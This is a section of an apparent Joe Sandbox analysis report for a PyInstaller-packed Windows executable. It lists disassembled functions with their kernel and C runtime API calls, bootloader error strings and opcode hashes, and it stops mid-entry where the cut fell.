                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3462794448-0
                                                                                                                                                                                                                                                • Opcode ID: af5051bae1bb50e3ccf69b50d5ac14561a54b739df452b641c0904f08e36c6c8
                                                                                                                                                                                                                                                • Instruction ID: 294a10dc7d3b9772d298fc8b9ea58a2a6babd96ee555ac5c571488e1705874c8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: af5051bae1bb50e3ccf69b50d5ac14561a54b739df452b641c0904f08e36c6c8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 384191A2B1868243E730AF12B5406AAA394FBC8FE4F840135DE4D57B89DE3CD543C760
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF7C71C4F81,?,?,?,?,00007FF7C71CA4FA,?,?,?,?,00007FF7C71C71FF), ref: 00007FF7C71CB347
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7C71C4F81,?,?,?,?,00007FF7C71CA4FA,?,?,?,?,00007FF7C71C71FF), ref: 00007FF7C71CB37D
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7C71C4F81,?,?,?,?,00007FF7C71CA4FA,?,?,?,?,00007FF7C71C71FF), ref: 00007FF7C71CB3AA
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7C71C4F81,?,?,?,?,00007FF7C71CA4FA,?,?,?,?,00007FF7C71C71FF), ref: 00007FF7C71CB3BB
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7C71C4F81,?,?,?,?,00007FF7C71CA4FA,?,?,?,?,00007FF7C71C71FF), ref: 00007FF7C71CB3CC
                                                                                                                                                                                                                                                • SetLastError.KERNEL32(?,?,?,00007FF7C71C4F81,?,?,?,?,00007FF7C71CA4FA,?,?,?,?,00007FF7C71C71FF), ref: 00007FF7C71CB3E7
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                                                • Opcode ID: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
                                                                                                                                                                                                                                                • Instruction ID: 84e7e0a9fadca4a6f36f01f422b65ca118ae486240f7ff63dd1cf62948d89dfb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 54115C21B0C64283FA657FA1769513DE1865FC4FB0FD45734E82E86BD6DE2CA5438322
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7C71B1B6A), ref: 00007FF7C71B295E
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                                • Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                                                • Instruction ID: 0e6d034a4e7fc8c4bebf70231812136ac6f2f6419f14b6921b6d034f5fc074f6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B31C462B1868153E720BF61B8416E6A694BFC8BF4F804132EE8D83759EF3CD54B8610
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                                • String ID: Unhandled exception in script
                                                                                                                                                                                                                                                • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                                • Opcode ID: 9d37adb8919aaa9301242e1672c0db5e18d6b44b4274937772719b263de12092
                                                                                                                                                                                                                                                • Instruction ID: fe9599cde958b9244c90cfe3cf0b1c5f1ac0c296915bac6f656c3aca88e967af
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9d37adb8919aaa9301242e1672c0db5e18d6b44b4274937772719b263de12092
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F312F726196818AEB20EF61F8552F9A360FFC8BA4F844135EE4E47B59DF3CD1068710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF7C71B918F,?,00007FF7C71B3C55), ref: 00007FF7C71B2BA0
                                                                                                                                                                                                                                                • MessageBoxW.USER32 ref: 00007FF7C71B2C2A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                                • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                                • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                                • Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                                                • Instruction ID: 817611a5d3294286b8bd5edb3c49afabb3c5bfebe8999a8e7b000bb8bffb938e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E921B172718B4183E721AF54F4847AAA3A4EB88BD4F804131EE8D53659DF3CD206C750
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF7C71B1B99), ref: 00007FF7C71B2760
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                                • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                                • Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                                                • Instruction ID: 64d08f87e1268a892e2fd38ffa748b565af9ca2ae3d8a0c340e32ee224ec91d1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FF218372A19B8183E621EF51B4817E6A394FBC8BE4F800135EE8D43759DF3CD6468750
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                • Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                                                • Instruction ID: 7d48d5ec2930485cf425f8dd2f30bdf2d43a517a67006d89db4082c16d051a11
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0DF0AF21A08B0693EA20AF60B498B799320AFC9B71F840235CA6F461E4CF2CD246C720
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                                                • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                • Instruction ID: b99009e7075c00af2b9655543ceb189c9fd05b428b6562c3fe5f9e1b9021c045
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D811B672D0CA1343F6563914F6DA3759844EFF8B74E850634EA6E062D7CF2C69438960
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,00007FF7C71CA613,?,?,00000000,00007FF7C71CA8AE,?,?,?,?,?,00007FF7C71CA83A), ref: 00007FF7C71CB41F
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7C71CA613,?,?,00000000,00007FF7C71CA8AE,?,?,?,?,?,00007FF7C71CA83A), ref: 00007FF7C71CB43E
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7C71CA613,?,?,00000000,00007FF7C71CA8AE,?,?,?,?,?,00007FF7C71CA83A), ref: 00007FF7C71CB466
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7C71CA613,?,?,00000000,00007FF7C71CA8AE,?,?,?,?,?,00007FF7C71CA83A), ref: 00007FF7C71CB477
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7C71CA613,?,?,00000000,00007FF7C71CA8AE,?,?,?,?,?,00007FF7C71CA83A), ref: 00007FF7C71CB488
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                                                • Opcode ID: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
                                                                                                                                                                                                                                                • Instruction ID: b9b6ea16b84fcbe13025ca2c23c611670384b90b0d97639ecc483b1a946ed828
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE113D21B0D64243FA68BFA5755617DE18A5FC4FB0FC48334E93E8A6D6DE2CA5438221
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                                                • Opcode ID: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
                                                                                                                                                                                                                                                • Instruction ID: 16145053c0ed3a18468c6fd78810d73d1cd33425ca6b9729971fed79934a4a0a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32111520F0920783FA687FA5785627E918A5FC5F70FD85734D93E8A6C2DD2CB5438222
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: verbose
                                                                                                                                                                                                                                                • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                                • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                                • Instruction ID: 922d11b8d62e10db57ae46b8a43be90811dd9f96d16df67f441aa31be4d89574
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5991D132A08A4682F761AEA5E45077DB7A1ABC0FA4FC44136DA5E433C5DF3CE4078322
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                                • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                                • Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                                                • Instruction ID: 83d486029c2d1cb82f270f4f28fc2789f2d4ab47bdb8e388e269bc910bf1185d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE81A433E0824287F7646EA5A11027CB7A8AB91F64FD68035DA0997299DF2DE9039361
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                • Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                                                • Instruction ID: 84f239a1754c7d21c042ef0a012b966b119375654e5d72b2eea359f60de99f95
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C4519072B296028BDB18AF15F446A78B791EB84FA8F904174DE8E47748DF3DE842C710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                • Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                                                • Instruction ID: 69018d22b3a797c0cf694384062b908ce680bd29574af46cd00a29181fac4f13
